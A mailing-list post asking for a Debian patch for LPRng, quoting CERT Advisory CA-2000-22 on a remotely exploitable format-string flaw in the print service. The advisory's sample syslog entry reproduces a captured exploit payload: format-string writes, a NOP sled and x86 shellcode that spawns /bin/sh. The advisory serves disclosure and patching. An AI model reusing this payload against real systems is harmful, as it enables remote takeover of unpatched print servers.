Does anyone know where can I find a debian-specific patch for the
lprng package?
Thanks in advance.
Why? Just read the following...
> Subject: CERT Advisory CA-2000-22
>
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> CERT Advisory CA-2000-22 Input Validation Problems in LPRng
>
> Original release date: December 12, 2000
> Last updated: --
> Source: CERT/CC
>
> A complete revision history is at the end of this file.
>
> Systems Affected
>
> * Systems running unpatched LPRng software
>
> Overview
>
> A popular replacement software package to the BSD lpd printing service
> called LPRng contains at least one software defect, known as a "format
> string vulnerability,"[1] which may allow remote users to execute
> arbitrary code on vulnerable systems.
>
> I. Description
>
> LPRng, now being packaged in several open-source operating system
> distributions, has a missing format string argument in at least two
> calls to the syslog() function.
>
> Missing format strings in function calls allow user-supplied arguments
> to be passed to a susceptible *snprintf() function call. Remote users
> with access to the printer port (port 515/tcp) may be able to pass
> format-string parameters that can overwrite arbitrary addresses in the
> printing service's address space. Such overwriting can cause
> segmentation violations leading to denial of printing services or to
> the execution of arbitrary code injected through other means into the
> memory segments of the printer service.
>
> Sample syslog entries from successful exploitation of this
> vulnerability have been reported, as follows:
>
> Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
> 'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
> XXXXXXXXXXXXXXXXXX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}
> 1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
> ]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
> E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
> M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
> ?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
> E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'
>
> This vulnerability has been assigned the identifier CAN-2000-0917 by
> the Common Vulnerabilities and Exposures (CVE) group:
>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
>
> The CERT/CC has received reports of extensive probing to port 515/tcp.
> In addition, we have received some reports of systems compromised
> using this vulnerability. Tools exploiting this vulnerability have
> been posted to public forums.
>
> II. Impact
>
> A remote user may be able to execute arbitrary code with elevated
> privileges.
>
> In addition, the printing service may be disrupted or disabled
> entirely.
>
> III. Solution
>
> Apply a patch from your vendor
>
> Upgrade to a non-vulnerable version of LPRng (3.6.25), as described in
> the vendor sections below. Alternately, you can obtain the version of
> LPRng which fixes the missing format string at:
>
> ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
>
> Disallow access to printer service ports (typically 515/tcp) using firewall
> or packet-filtering technologies
>
> Blocking access to the vulnerable service will limit your exposure to
> attacks from outside your network perimeter. However, the
> vulnerability would still allow local users to gain privileges they
> normally shouldn't have; in addition, blocking port 515/tcp at a
> network perimeter would still allow any remote user inside the
> perimeter to exploit the vulnerability.
>
> Appendix A. Vendor Information
>
> Apple
>
> Apple has conducted an investigation and determined that Mac OS X
> Public Beta and Mac OS X Server do not use LPRng and are therefore not
> vulnerable to this exploitation.
>
> Caldera OpenLinux
>
> See CSSA-2000-033.0 "format bug in LPRng" at:
>
> http://www.calderasystems.com/support/security/advisories/CSSA-
> 2000-033.0.txt
>
> Compaq Computer Corporation
>
> Compaq Tru64 UNIX S/W is not vulnerable.
>
> FreeBSD
>
> FreeBSD does not include LPRng in the base system. Older versions of
> FreeBSD included a vulnerable version of LPRng in the Ports Collection
> but this was corrected almost 2 months ago, prior to the release of
> FreeBSD 4.2. See FreeBSD Security Advisory 00:56
> (ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:56.lp
> rng.asc) for more information.
>
> Hewlett-Packard Company
>
> This does not apply to HP; HP does not ship LPRng on HP-UX.
>
> IBM
>
> IBM's AIX operating system is not vulnerable to this security exploit.
>
> Microsoft Corporation
>
> Microsoft doesn't use LPRng in any of its products, so no Microsoft
> products are affected by the vulnerability.
>
> NetBSD
>
> NetBSD does not include LPRng in the base system; however we do have a
> third-party package of LPRng-3.6.8 which is vulnerable. There's work
> underway to upgrade it to a non-vulnerable version.
>
> OpenBSD
>
> OpenBSD does not ship lprng.
>
> RedHat
>
> LPRng Version 3.6.24 and earlier is vulnerable.
>
> See RHSA-2000:065-04 at:
>
> http://www.redhat.com/support/errata/RHSA-2000-065-06.html
>
> SGI
>
> IRIX does not contain LPRng support.
>
> SuSE
>
> SuSE is not vulnerable. Please see additional comments at:
>
> http://lists.suse.com/archives/suse-security/2000-Sep/0259.html
>
> References
>
> 1. VU#382365: LPRng can pass user-supplied input as a format string
> parameter to syslog() calls, CERT/CC, 10/06/2000,
> https://www.kb.cert.org/vuls/id/382365
> _________________________________________________________________
>
> The CERT Coordination Center thanks Chris Evans for his initial report
> on the vulnerability described in this advisory.
> _________________________________________________________________
>
> Author: This document was written by Jeffrey S Havrilla. Feedback on
> this advisory is appreciated.
> ______________________________________________________________________
>
> This document is available from:
> http://www.cert.org/advisories/CA-2000-22.html
> ______________________________________________________________________
>
> CERT/CC Contact Information
>
> Email: [EMAIL PROTECTED]
> Phone: +1 412-268-7090 (24-hour hotline)
> Fax: +1 412-268-6989
> Postal address:
> CERT Coordination Center
> Software Engineering Institute
> Carnegie Mellon University
> Pittsburgh PA 15213-3890
> U.S.A.
>
> CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
> Monday through Friday; they are on call for emergencies during other
> hours, on U.S. holidays, and on weekends.
>
> Using encryption
>
> We strongly urge you to encrypt sensitive information sent by email.
> Our public PGP key is available from
>
> http://www.cert.org/CERT_PGP.key
>
> If you prefer to use DES, please call the CERT hotline for more
> information.
>
> Getting security information
>
> CERT publications and other security information are available from
> our web site
>
> http://www.cert.org/
>
> To subscribe to the CERT mailing list for advisories and bulletins,
> send email to [EMAIL PROTECTED] Please include in the body of your
> message
>
> subscribe cert-advisory
>
> * "CERT" and "CERT Coordination Center" are registered in the U.S.
> Patent and Trademark Office.
> ______________________________________________________________________
>
> NO WARRANTY
> Any material furnished by Carnegie Mellon University and the Software
> Engineering Institute is furnished on an "as is" basis. Carnegie
> Mellon University makes no warranties of any kind, either expressed or
> implied as to any matter including, but not limited to, warranty of
> fitness for a particular purpose or merchantability, exclusivity or
> results obtained from use of the material. Carnegie Mellon University
> does not make any warranty of any kind with respect to freedom from
> patent, trademark, or copyright infringement.
> _________________________________________________________________
>
> Conditions for use, disclaimers, and sponsorship information
>
> Copyright 2000 Carnegie Mellon University.
>
> Revision History
> Dec 12, 2000: Initial Release
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP for Personal Privacy 5.0
> Charset: noconv
>
> iQCVAwUBOjYxtAYcfu8gsZJZAQEp/wP/Zo5uIe1y9vbTEmQz6CtlkLaejrEzzRua
> eBakIkIz5CzLKL3+zMFsmTaC306fgFnOcV3lz9NmAzNLg8mqFZYruaTTVuTeY0Yg
> +QTWG6DngiqH8ttKV91MjPGZZFpUWahVvVk+xUU/fLCMoc9FAUAenYoOfuduD9nO
> w8+1WAtQPUs=
> =bNBX
> -----END PGP SIGNATURE-----
